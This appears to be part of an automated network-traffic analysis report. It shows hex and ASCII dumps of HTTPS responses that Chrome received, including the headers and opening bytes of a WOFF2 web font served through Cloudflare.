                                                                                                                                                                                                                                                                                                              Data Ascii: z=KSt)n0*b#rf-7?Vhwk0;\QK+QaR+d27'DJQAyKzt!4V(WgFh,y`Uw(7s?>|2lt.%L$FtAxfJx6C_G
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC915INData Raw: 87 23 d8 a5 09 59 b0 64 70 de d9 d2 30 9e 1d 2b fc f2 ca e5 2b 28 b8 1a eb cd 3b 2e 63 b5 6d f8 75 85 9a 19 bb fc 39 62 65 7b ef a6 8b be 66 7a 32 be 3c e3 1e 5c d2 c4 67 1f e7 52 d4 11 d2 58 d0 6f 71 04 1b 90 f2 02 cc ae 2f be bf 7e 8e 89 51 ca 43 cf e2 68 c9 a9 7d c0 04 a6 f8 68 ba 8a 25 66 7d 02 9c 01 71 b0 68 ab 6b f0 d2 bc 0a 2b d8 e6 88 f7 c1 36 ef 7e f6 46 b0 2d 99 70 10 07 36 38 09 12 e5 f9 cf 87 eb 5c d9 42 7b 56 ac e2 03 a9 c6 b2 24 e8 b3 bd 3c 6e 7b ab dd a6 67 37 30 e5 56 14 42 ea 42 a2 73 ba 72 5b 12 c3 60 e9 26 d8 7d 05 61 35 e9 6e 32 59 d3 17 da a6 a4 02 d0 4f 8f 17 ee 07 14 1a f1 75 8c d3 0c 54 25 71 9f 1a b1 1b 58 7e a1 f1 e0 c8 3d 14 a1 68 6a e1 60 45 27 44 91 10 43 47 02 37 0d 38 28 c4 de 2d d9 a5 61 4b 9a 17 cd 25 36 7e 56 ab cd 6f 0b
                                                                                                                                                                                                                                                                                                              Data Ascii: #Ydp0++(;.cmu9be{fz2<\gRXoq/~QCh}h%f}qhk+6~F-p68\B{V$<n{g70VBBsr[`&}a5n2YOuT%qX~=hj`E'DCG78(-aK%6~Vo
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC917INData Raw: 0c 22 12 13 f9 01 1b 5a 88 4b 0d c9 9a 24 79 8d e0 c1 fb 79 2d e3 e2 29 63 03 7b 58 52 96 ea c1 33 ba b6 7f 45 f5 28 6c 51 09 ce 3c 32 25 88 6c c6 9e 49 fd e7 bc ea 89 0a 45 30 ea e1 31 0e 07 c9 56 2b fe a0 02 84 2d b5 6a df f4 c3 3f a7 19 b7 6b 8a 02 8f 2a a1 35 8c df f4 ab 48 1b c5 73 e6 e7 6c a8 1b 3e 30 c0 fe 4b 8a 09 7f e1 c4 7e d9 db 98 0c 30 87 ba 3a c8 9d 8b b3 0e c8 1d f8 f6 6c 30 6b e6 fd cb c0 57 99 99 d9 9f d6 83 7f 23 7a d7 54 e8 3e 91 f1 68 70 d1 45 7f ce 62 8d d5 ec b3 48 48 9e 63 ba 81 b3 b1 75 9b 86 16 3b 70 21 70 e1 c6 f0 6d aa e7 60 ea 98 0e 1f f4 8f 73 0c 76 bb 75 e5 e7 02 20 82 ff 63 44 56 ee ef 2b 8a 73 38 07 cc 02 d1 6d 18 3c 1b c1 1f 5f 5c bc 0f 54 7c e3 17 49 42 fc 2c 84 1a 0b 3d 30 48 0f 54 07 5f f8 b2 16 82 8f 36 9e 6e 0b 48 9c
                                                                                                                                                                                                                                                                                                              Data Ascii: "ZK$yy-)c{XR3E(lQ<2%lIE01V+-j?k*5Hsl>0K~0:l0kW#zT>hpEbHHcu;p!pm`svu cDV+s8m<_\T|IB,=0HT_6nH
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC918INData Raw: 7e d0 85 c8 53 80 97 94 2d 98 a0 04 a2 c5 6e 49 f0 27 90 86 22 f6 2a f0 20 7a 1a 8d ea 0b 98 8e 5a c0 00 be 6f 6b 68 71 3f ec 1b de 1f 72 b9 13 5e 70 3b 2b 70 61 84 72 66 53 a2 3d b2 c2 ff 3d 43 53 97 e7 50 da d2 e2 95 e7 33 cc ba 46 59 f7 34 83 9e cd 42 0a 8a d0 6a 6a de 35 91 28 69 72 29 a4 f6 28 a0 31 91 a9 f8 08 81 50 42 6f cd 27 c5 1e 6a 01 c5 20 21 6a 75 c4 dd 85 24 5b b0 27 19 bd c5 3c 09 9d f9 03 0a b3 66 6c 89 45 55 8f 14 bf 3d 26 71 11 b2 71 a2 cd 8a 4a cb 96 b2 98 1e 54 25 56 60 04 63 d9 a7 21 3e 6a b4 71 6a 41 94 2e 96 55 df ba 10 46 9e d7 10 4a 04 22 68 8a 9e 2f 59 cc dc 07 9f 8a 36 76 44 41 f8 ea 1d 63 68 4f aa 2c 15 fd bb ff b3 a2 85 fa cd 74 70 da c5 30 9e cb a7 18 e2 ab e0 5b 12 35 46 df c8 53 cc a1 e8 e2 a1 41 1d 6c e1 34 38 96 0d 12 e2
                                                                                                                                                                                                                                                                                                              Data Ascii: ~S-nI'"* zZokhq?r^p;+parfS==CSP3FY4Bjj5(ir)(1PBo'j !ju$['<flEU=&qqJT%V`c!>jqjA.UFJ"h/Y6vDAchO,tp0[5FSAl48
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC919INData Raw: 63 52 46 d1 e6 b9 dd 9c c2 08 7e 81 15 ae 48 ef 6e 4d 85 d7 a3 d7 db 54 4e 9a 4a 28 e9 5b d5 05 cf 77 96 81 50 96 e6 56 dd 45 69 c4 bd 19 30 4c 9a f1 e3 49 ec 19 37 2d e4 82 65 d0 60 3d c4 ec 5d 84 30 91 52 99 a8 e2 84 84 3a d0 6c d1 9c 72 f5 22 af 8a 64 df 83 b7 5c e1 0e 9b 7c ab cc ee 64 cb 91 ac a1 c0 36 33 55 e7 7d 54 88 82 fe 23 fc b4 61 b2 1f b9 8e 82 47 f2 03 12 f5 b7 ef c6 ff aa bf e5 6e e9 37 88 b6 fe a1 ca 0b 30 40 ab 63 93 38 c5 d3 e4 ee 42 31 1f 86 17 42 df 90 b0 0c 3b d3 b7 05 22 7b ce 68 b1 39 27 b6 20 1e f5 03 c1 40 0c cd 19 0c 0b d6 1c c1 8e 2f 82 fb 7d 00 c1 50 dd 42 a3 01 fe 61 82 02 f7 88 1a e7 16 a6 25 5d 4b 2c d4 66 99 57 12 50 43 84 32 3f 73 82 f7 42 c4 f5 db 6b ed 5b 1b b4 1b 18 92 b7 47 22 a8 3f cb 31 e8 97 0c 40 56 03 dc 61 f4 d4
                                                                                                                                                                                                                                                                                                              Data Ascii: cRF~HnMTNJ([wPVEi0LI7-e`=]0R:lr"d\|d63U}T#aGn70@c8B1B;"{h9' @/}PBa%]K,fWPC2?sBk[G"?1@Va
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC920INData Raw: d7 25 e8 2a b4 32 f2 06 ab f3 4c d4 f5 61 6b e7 c2 20 42 d6 94 14 40 00 4a 90 3e 9a 52 b2 32 ac 31 0d e0 65 0c eb 9c ee 62 7e 6c fd a9 63 41 f7 63 65 d2 0b 2a 88 8b ad 18 91 65 97 d5 de 47 41 2b 60 f8 0f f7 cd 6f 1a e7 2f 97 2b ea ca 97 a0 cc 40 f5 c7 5c 5f 22 af ef fd 54 73 85 d4 f9 7f 11 9a 8e c5 90 a2 96 30 14 c3 d6 52 08 c6 1b 1c 74 53 95 41 c9 35 36 ac 22 23 55 e5 59 38 ca f1 90 8f d6 b8 94 1f 1b 11 fd 16 8e b9 20 0e 61 c6 8b 22 d6 58 21 82 72 91 2b 5e e0 a4 9d 8f 58 72 da 57 80 b6 29 c4 bc c1 93 00 de 30 53 7c 9d aa dd ca 55 a9 07 ca 6a 4a 15 6b f7 e7 94 1b bd 93 8a 4d ca 24 d3 4f f0 cb d2 e9 33 47 0f a5 1c bc 4c 83 a4 87 7c b4 b4 d2 7f 1d d1 95 58 71 72 aa 91 cd 75 79 35 32 4a fe f8 5b 1d ae d6 18 bd b3 b2 dc 71 7c e1 59 91 74 72 4f 58 d8 d3 1c b5
                                                                                                                                                                                                                                                                                                              Data Ascii: %*2Lak B@J>R21eb~lcAce*eGA+`o/+@\_"Ts0RtSA56"#UY8 a"X!r+^XrW)0S|UjJkM$O3GL|Xqruy52J[q|YtrOX
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC922INData Raw: 05 e8 1a 18 56 f1 b6 18 81 11 06 fa 08 21 50 cc 46 e8 48 ff d2 ff d8 d3 72 7f 1e 64 90 dd 89 3d 4e f9 0c 4f 8f 33 b7 3a d5 12 8e fa 0b 2e 96 ab f2 d3 e2 a7 d6 be 8f 70 e7 b6 db d3 f8 c5 80 01 66 ee d5 4c 6b 9f 58 9d 10 d8 60 5b be b2 94 a7 3b 21 30 9f 0c 07 18 a3 62 f4 10 6c 4d c0 de e6 95 fc 97 a6 1f 53 08 8b e2 0f 76 03 38 38 af 7f d3 db bd 22 8b c6 0d 21 b0 0f 14 37 b8 21 38 1a 83 59 28 19 60 30 b7 7b 41 a3 01 98 b5 47 52 c7 db 5b f8 3a 85 dc 6f 77 df 04 ef e1 76 5e 74 ab 27 96 d9 e0 f1 54 35 92 c2 ac 06 82 51 5a 00 3f 7b 71 40 41 12 5d 20 bd b8 9e 2d 07 38 58 42 7e f6 62 f0 06 12 3b e4 21 3f 40 eb d0 24 6d 27 67 25 a8 93 e7 c4 b4 cc 08 b7 66 e1 27 23 1c 17 d9 06 67 46 07 d9 3f 8b 75 57 64 a3 1d 98 a8 4c a1 0c 65 d5 74 26 0c 63 0e b3 cc 70 a9 f9 6a ca
                                                                                                                                                                                                                                                                                                              Data Ascii: V!PFHrd=NO3:.pfLkX`[;!0blMSv88"!7!8Y(`0{AGR[:owv^t'T5QZ?{q@A] -8XB~b;!?@$m'g%f'#gF?uWdLet&cpj
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC923INData Raw: 38 40 54 80 4d 24 5c bb 9a ea 0b e0 d2 38 64 7c db 44 6a b1 15 49 13 ac f1 0a ad 17 46 23 54 4a 08 cc 31 92 2e 06 6b 62 33 ed 1c 9b 0c a4 6e 5b e9 1e 28 06 4b aa e4 f2 3a 4a 51 4e b4 60 5f 18 65 ec bb 58 2c 42 87 11 60 81 8b 0c 8f 90 0a f1 f3 a7 44 59 13 a5 87 ed 9e 49 ad 44 b3 05 ff e9 43 7b 69 d8 cd d4 49 1d 37 d7 74 8b 73 16 87 3d d8 7a 81 d8 3d ca fd c7 1e b0 d7 56 c7 8a e2 4f f8 82 7d 86 13 ab 72 18 0e b0 53 e7 1d fb c7 3f 7a 3d 6f f1 4f ab b7 58 94 10 82 d0 83 2e 95 b7 ba ae bd fa 82 9c 23 9d 63 16 68 3e 42 84 b2 c7 56 f4 2a fe bd 9b e7 e5 29 56 fe 7b f0 40 b2 71 d1 43 fe 07 40 85 9b da bf 5f 2e ee a0 78 90 07 18 ea 11 9e 36 6c 80 24 86 ed ab 12 b8 33 73 5c e3 19 1a 7d 87 6d 4d 04 5a 99 8c 6b 06 8a aa ec 62 1e 10 83 fb fc d2 80 7d 5e 6c 40 b9 68 42
                                                                                                                                                                                                                                                                                                              Data Ascii: 8@TM$\8d|DjIF#TJ1.kb3n[(K:JQN`_eX,B`DYIDC{iI7ts=z=VO}rS?z=oOX.#ch>BV*)V{@qC@_.x6l$3s\}mMZkb}^l@hB
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC924INData Raw: 86 09 d7 de 67 5d ab 23 df 11 65 7d 13 8a 25 9a bb a0 b6 a4 62 61 95 7d 83 15 3a 0a 5c 61 45 e7 ce 55 5c 29 b4 28 16 e4 d4 22 27 57 65 12 48 1a 63 d2 07 bb 5e 2f 5c 8e fa 10 da b4 39 ee f6 de bb ed ae a0 15 46 1c 56 14 d1 9d 98 95 b4 a1 42 38 fb a5 e4 44 85 2b 01 43 32 91 c2 14 b8 00 37 25 95 3d d9 8b e2 50 fb 7f b6 97 ef 5f 24 9b fb ab 84 d2 0a 30 1b 86 ac 06 a3 58 8e 97 87 cd 3a 6e 77 9e 18 0d 59 51 20 39 59 7c b0 7b 90 e4 2c 3b 79 93 47 25 f3 a7 e4 af 83 4e aa ab 58 75 d7 79 fd d3 1d e9 2d ea 2b c9 0a 1e 92 98 11 80 0f ed 2b 6f 13 f2 98 15 c5 39 cf 06 4e 8e b6 bf 31 04 01 4e fb 56 ee 3d d6 65 90 fa 60 0f 83 b5 e4 44 ab f2 1d 4a 2e a9 e0 92 bf 0e 9a e6 79 71 fe 47 56 d0 09 5d 8b a4 1a 98 ff 49 76 f5 5b f2 ff ac a5 8c 64 4e 0d 29 e9 d3 c3 09 e5 6b 11 82
                                                                                                                                                                                                                                                                                                              Data Ascii: g]#e}%ba}:\aEU\)("'WeHc^/\9FVB8D+C27%=P_$0X:nwYQ 9Y|{,;yG%NXuy-++o9N1NV=e`DJ.yqGV]Iv[dN)k
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC926INData Raw: 80 50 d6 86 c1 5b f3 54 41 49 cb 7b 72 ff 56 5f 17 56 cd 50 b8 71 5d 84 55 79 a4 85 c1 3d f9 5c a8 44 fb 4c d3 b3 97 69 2e 95 b1 aa b7 a3 50 ae c5 50 36 9a 7f cc bc 1a b4 9a 38 05 28 19 88 98 b4 35 5a db c8 8d 76 56 66 33 53 03 4c 30 ef 2d 6d c7 da d3 14 49 19 db 5c 95 d0 a7 25 4e a2 ad 03 c3 b4 e0 19 d2 7f 25 5c 84 f3 9b 19 c4 c8 ac c3 50 51 38 5c 1b c8 a4 0f c1 4b fb b8 65 3a b6 9d dc 27 1c 4e a4 6c fc 20 31 a1 d8 76 dd 45 48 da f9 15 1c 49 84 b3 c6 b1 8e dd 5c 33 3c e3 36 67 df fa 31 a6 ba be f8 7e f4 1c 9e 8e 02 5f 87 9f 14 0c ee 84 14 b2 6f e3 ca 77 26 4c 57 c3 41 b4 60 2a ce 8a 0a 7b c5 7b 47 1d c6 26 86 52 5d 28 b2 d5 59 b6 73 6b d1 18 c1 36 8a 4e 92 5f 0f 75 59 b8 7d cf 68 41 26 e7 b6 2c fa c8 f7 11 ca 9a b7 8a 7a 39 6a 29 c5 34 94 2e 5c 68 4c 94
                                                                                                                                                                                                                                                                                                              Data Ascii: P[TAI{rV_VPq]Uy=\DLi.PP68(5ZvVf3SL0-mI\%N%\PQ8\Ke:'Nl 1vEHI\3<6g1~_ow&LWA`*{{G&R](Ysk6N_uY}hA&,z9j)4.\hL
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC927INData Raw: fd 4f b0 a8 f7 08 16 fe 8e 25 20 60 3b 75 74 7b b1 7e 01 81 e0 52 95 93 43 67 ca 45 a2 2b a4 60 da b4 60 4c c1 4a da 07 33 f0 09 93 54 05 a7 64 1d 59 36 e0 7a 68 0c 94 13 63 7c 02 f3 c0 f7 bc 1e db 51 94 4e af 06 f5 72 6a 50 5d 32 ac 7c 80 53 06 1d 95 6c 22 2b f5 71 3b 33 c3 9e 99 67 cc 17 20 ca 7c 09 56 c1 a3 b7 fa c1 c1 69 15 6f bc 11 1f 87 1e b2 3d 09 f6 c5 ff f3 f9 e9 ba 72 df bf c1 29 71 43 c7 4e 56 2e 41 70 24 13 b7 3a 2c 38 83 f6 ab 29 d9 f8 21 12 a8 8b fa a3 4b ba f8 a2 23 88 3a 1a db c9 1f 46 e8 9c ee dd 86 3e 30 49 b1 10 9b 47 7c 23 3b f0 78 e1 a4 82 31 26 af 38 fa 95 80 fd c5 cc 8f e6 fc 79 e9 31 6a e2 4f d0 01 23 15 ea 15 c7 41 70 1c 90 6f 81 9e 5f 74 6a 96 a9 11 96 c2 7e 69 70 72 ed e4 89 0e 11 55 6c 8b 4c 31 19 5e d5 9f 52 1e fb 89 2e fa 3b
                                                                                                                                                                                                                                                                                                              Data Ascii: O% `;ut{~RCgE+``LJ3TdY6zhc|QNrjP]2|Sl"+q;3g |Vio=r)qCNV.Ap$:,8)!K#:F>0IG|#;x1&8y1jO#Apo_tj~iprUlL1^R.;
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC928INData Raw: 26 73 df 98 4e 3f c4 fb bd fe 58 b3 63 57 bb 56 df 3d a6 a2 63 0b 4a 21 7a 79 50 ae 50 5c 33 47 ec fb 6f d6 57 58 e3 5c d7 3c f8 27 2b 0b b9 ac fd 6e cc 20 0e 56 31 76 ba d9 ad f7 85 11 b0 c0 61 fc 2e aa bd 53 fc 30 ec 74 f4 38 f5 31 08 a0 5b f4 32 4a 5d e6 2a 16 d6 ea 6a a3 63 97 5b 21 0f f2 33 d9 d3 47 f4 11 27 b6 50 4a 83 95 99 68 47 ad bc c1 d5 1e e1 5b 65 2d 55 62 46 df 71 2d ce 6e a5 d4 44 70 ed a7 d9 5f 31 e2 f1 46 33 40 b2 9b 34 22 b2 74 95 42 10 5f d9 fc ae 5f 9f 6c fa 2b 40 01 3e b8 67 02 37 3e 9c c4 59 a5 78 1d 5f 92 6d 37 7c 97 97 f1 67 4e f1 f6 5e 3c 38 bd 5f 0f b9 fb 2d 3c de 1c da c4 d3 39 41 8d 8c 53 b3 44 8e b1 db ed cc f1 ba 6a 3d 1f 2d d8 47 72 d8 12 04 ab da d4 39 d1 c5 9b dd 51 b0 8e a8 09 60 a7 10 bd 70 6f 23 d6 69 6c 64 5f 52 2d 03
                                                                                                                                                                                                                                                                                                              Data Ascii: &sN?XcWV=cJ!zyPP\3GoWX\<'+n V1va.S0t81[2J]*jc[!3G'PJhG[e-UbFq-nDp_1F3@4"tB__l+@>g7>Yx_m7|gN^<8_-<9ASDj=-Gr9Q`po#ild_R-
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC930INData Raw: f6 7d 1b 11 8e 5b 36 98 53 b5 38 c0 a4 cb 0e 8f 3c d6 1a 0f 38 76 f4 c2 08 66 47 53 7e 8e c6 78 67 ca c0 d2 f8 f0 37 e1 96 48 1b 89 50 73 54 82 a1 43 00 4c 72 5e 9f 8b e1 cf 8d ff 29 7b 2c a6 01 27 6a 2a 00 63 6c 68 61 de ea 5e a2 e3 e7 c9 75 99 72 73 f2 86 9e a4 51 9a 1b cc 01 00 ef 24 00 60 8a db 57 2b 4f 94 1b 07 94 21 dc e4 e7 63 fd 8d bc 14 f2 92 ee 57 3e 74 a5 ff e2 f1 34 57 9e 22 6c ea 54 2d 62 f4 b8 88 c2 bd 28 4f 8c 02 5e 8a 94 1d 21 ba a4 9a a4 8a e2 19 54 3b d2 29 f4 9e 3d c0 98 17 52 a7 2c 46 19 18 26 e1 b2 c1 bc c2 84 3f c0 ca e0 9b 30 96 c4 75 f7 b4 d0 6d 1e cc 47 5f 89 40 d1 1c 02 7e 7d cd 22 91 5e ec 96 b7 30 b2 94 3f ee ba 6a 19 a9 69 74 d2 e5 e2 7f 75 d9 58 52 a4 47 9a 95 f5 1c 52 57 af 50 a8 38 86 5b b8 cb 39 e3 6d cb ea 97 9d d3 b3 30
                                                                                                                                                                                                                                                                                                              Data Ascii: }[6S8<8vfGS~xg7HPsTCLr^){,'j*clha^ursQ$`W+O!cW>t4W"lT-b(O^!T;)=R,F&?0umG_@~}"^0?jituXRGRWP8[9m0
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC931INData Raw: e8 b4 64 6a 65 cb c2 da 9e 79 9d fa b6 2a 2d 82 23 c2 46 ce 88 9b 44 a7 df fd a2 e5 3f 4f b1 cb 55 ab cf 89 ff 7c 1c a6 af 2e 6c 7d f9 f2 1f 70 b1 ca 10 e2 7f 6c 63 df 29 ad 70 0d 0e 3b 2c bd b0 3d 32 a3 55 a6 5c 55 59 3d 43 d6 8a 14 8e 2f 23 42 f2 ca a4 12 70 3e a7 98 91 28 d5 60 fc ef 95 d4 bf 58 5f 23 61 e7 ad d5 95 23 b7 64 07 e5 c9 57 90 c9 91 ce fc ed 2b 8a c3 60 c3 8c 09 75 5f 0b 8f bd 8a 98 9e 50 a6 5c 45 5f d0 db a9 b2 54 74 cc 34 de a6 ba 28 d1 9e 9f 55 9b f2 79 f5 1a 34 6a d2 0c ab 45 ab 36 ed 3a 7e a0 dc 3f 96 c3 e9 d6 a3 57 9f 7e 03 06 0d 19 36 62 d4 98 71 af bc 36 61 f2 b5 d2 2b 6c bc 3f ec 0e fc ef 8d 43 47 a1 30 7f e1 c4 a9 b3 d0 d8 be ef 6d fd f2 7b e7 3c cb 2f 7b d7 07 1f a3 f9 0b 8d ce c3 f5 c7 21 04 cd eb c2 89 76 33 a4 5c f2 5c ba ca
                                                                                                                                                                                                                                                                                                              Data Ascii: djey*-#FD?OU|.l}plc)p;,=2U\UY=C/#Bp>(`X_#a#dW+`u_P\E_Tt4(Uy4jE6:~?W~6bq6a+l?CG0m{</{!v3\\


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              75104.21.0.95443192.168.2.1649802C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC932INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:27:40 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: font/woff2
                                                                                                                                                                                                                                                                                                              Content-Length: 93276
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 25 Aug 2023 04:00:32 GMT
                                                                                                                                                                                                                                                                                                              ETag: "16c5c-603b762dd727e"
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oe1%2FowQ8xQLTDsljaHzCIBhOPAS91hdVE6n%2FJVWNkPJ8UH%2FwQdz6qkgJ8zOUsxmxXd6usey%2BjDidLteVmdVx8Ar%2FYNKnSzt0QQxP%2BZDDZ5dB0OlAunDOZyPdjEyuJI2IyDq0cU6%2F6Ajhb%2Bc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              CF-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd4083f3313bb-IAD
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC933INData Raw: 77 4f 46 32 00 01 00 00 00 01 6c 5c 00 14 00 00 00 04 b2 20 00 01 6b e0 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a a4 76 1b 83 bb 26 1c 93 24 3f 48 56 41 52 a0 6a 3f 4d 56 41 52 81 46 06 60 3f 53 54 41 54 81 36 27 38 00 91 18 2f 81 48 11 08 0a 81 f8 0c 81 d3 78 0b 89 1a 00 30 8b e7 3a 01 36 02 24 03 92 30 04 20 05 97 7a 07 a2 17 5b 12 9a 94 07 25 22 db df 13 ba a5 ab c1 a5 a2 a8 fe 21 df bb 49 da 54 19 b0 7f a9 77 90 21 63 9b 48 1d ce cd 74 1d 5d 6b a5 08 9e a7 0f c8 36 9d f1 82 43 79 c3 a8 7f 55 6c b7 72 65 ff ff ff ff ff ff 9b 92 49 8c e9 25 e8 25 f9 7f 00 15 44 45 b1 a0 ba ce 76 d3 69 ae 51 46 38 dc dd 84 83 d2 69 48 19 21 72 0a ca e2 f4 da d1 50 34 5a 5b b9 db ae 1d f6 5a 73 10 9e 89 b6 6f 06 0e 72 ef e2 38 62 1c 4f e8
                                                                                                                                                                                                                                                                                                              Data Ascii: wOF2l\ kv&$?HVARj?MVARF`?STAT6'8/Hx0:6$0 z[%"!ITw!cHt]k6CyUlreI%%DEviQF8iH!rP4Z[Zsor8bO
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC933INData Raw: ab 4e 41 aa d7 2c 7f d0 ca 5d 8b 82 8e 97 b8 a4 16 c9 86 4f 6e f3 a3 ad 2f a5 14 58 7c 5f 3d a5 d4 d7 65 2c a5 74 53 f9 9b 33 5a e4 d5 71 5f 9e e9 8e e3 eb b5 27 46 5b f1 1b 6a 52 9e 3f 55 a2 82 6b a4 3a 2b 3b 19 fa 5a e1 63 6f 35 db 96 fc 6c ce b6 e7 b3 79 56 f6 4d 64 fd 97 34 cd aa 36 9b 7f bd e7 11 a3 7f b9 81 91 1c ff 4c 38 71 fb f9 88 5f c2 97 06 0d 41 58 a7 79 07 43 63 0a 0b 98 41 67 62 0a 19 61 b2 4b c2 88 da 97 1a 4e df b7 a5 0e c2 60 2d 16 ca 4e 09 62 a1 75 bb d6 e5 71 dc d0 69 0b 53 c2 7f c5 70 a5 96 6a 2a 13 fa d0 66 41 85 b2 ae b2 ba fa d8 3f 87 5a ae 45 65 af 7e 7c e3 83 5c a9 d4 54 5a 8a 5f aa 1f 8a 3f 92 2f 61 d2 36 34 8b 1e 2b da 5d 8f c0 28 67 71 ac b6 64 85 15 5c 4b 97 e2 da 53 1c d4 8f 7a 81 69 c4 6c 5b f2 18 c0 c9 ed 95 03 8a 90 c3 88
                                                                                                                                                                                                                                                                                                              Data Ascii: NA,]On/X|_=e,tS3Zq_'F[jR?Uk:+;Zco5lyVMd46L8q_AXyCcAgbaKN`-NbuqiSpj*fA?ZEe~|\TZ_?/a64+](gqd\KSzil[
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC935INData Raw: 22 54 b0 70 b3 90 e5 d0 53 52 3d fc 7f 2f f7 ef fd 14 73 02 79 87 75 ea 78 45 98 de 7d 3a 13 ef be 36 fb aa 20 8c 54 21 c9 57 f3 dd 6d 1a 18 46 3c c9 e4 9b d0 f4 25 bc bd 4d de de cd 6f 26 16 59 73 f8 7f ba 7c f5 4e e8 dc 74 7c 8a 31 dc ed 33 a9 b3 bb bf 68 08 1b 68 30 20 4d 2c 00 98 ff df 6c f6 a5 f5 28 4a 2a 5a e6 80 d0 18 0f df 8e 59 e3 e3 96 d6 19 13 fd dd e8 d5 bd ef d5 eb aa d7 05 6d 10 a2 bb 85 06 35 68 3e 82 31 0d c8 80 b4 86 57 55 0d 4d a3 99 83 5a ec 2e ea 6f bc 2b 60 35 bf 35 5a 83 b4 de fb dc 86 73 36 72 d9 a6 1b 6d b6 41 b8 a1 37 41 18 59 1b 24 0b ff af f7 a8 ab 1d 5d 06 32 bc 00 f8 f2 2a fd 76 93 81 34 fd 8b 3f 9e 8d a6 5a c0 65 a8 f3 bf 9f f6 8a e5 7a 2d b7 76 66 8d cc 9e 17 b9 71 70 7c a4 bf 5f 72 bd 73 dd 99 e6 a5 b3 17 a5 29 b5 d0 4c 00
                                                                                                                                                                                                                                                                                                              Data Ascii: "TpSR=/syuxE}:6 T!WmF<%Mo&Ys|Nt|13hh0 M,l(J*ZYm5h>1WUMZ.o+`55Zs6rmA7AY$]2*v4?Zez-vfqp|_rs)L
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC936INData Raw: 81 94 e1 59 d7 41 b0 48 10 6c b7 4a 89 d6 52 1a 83 b5 38 47 18 ce 28 fa f1 6d 62 3a 8e 5f 24 09 69 4a 96 95 3c 5f 2c 8a 22 a0 2c a9 2a d7 b5 dd b6 78 18 ec b1 5e 60 b9 6c 9a ed b6 ef 0f 87 71 3c 1e a7 e9 74 2a 33 e7 f3 6a 75 b9 ac d7 58 18 26 74 49 c2 14 e5 05 34 8d a2 6e 37 96 85 90 e7 11 12 04 cb c2 93 84 99 ae 73 9c 69 f2 7d 8c a9 a9 cb 63 d2 d3 83 83 f3 f3 23 23 55 aa c4 44 a2 87 7e a8 81 3f 5f 2c 73 43 7f 99 98 34 f2 ba 8e 2b 7a 68 c0 f1 0f 2f 1e 6c 6a 7a 60 0c 13 89 88 62 3c 0e 61 b3 b9 df 8f 46 be bf 5e 13 41 92 56 2b c3 f8 7c 99 4c 34 9a cd 4e eb 24 e9 11 08 42 82 50 55 8a ca e7 09 22 9f a7 e9 02 b3 d7 4c 7f 80 16 b4 8e d1 da 94 bc cf 19 32 f7 ec cb 01 c7 91 d2 75 8d 69 51 fe a7 c3 d9 5d 60 c0 80 9d 77 4e a7 e7 9d 64 4c 38 e4 12 5b ea 9f 6f 23 16
                                                                                                                                                                                                                                                                                                              Data Ascii: YAHlJR8G(mb:_$iJ<_,",*x^`lq<t*3juX&tI4n7si}c##UD~?_,sC4+zh/ljz`b<aF^AV+|L4N$BPU"L2uiQ]`wNdL8[o#
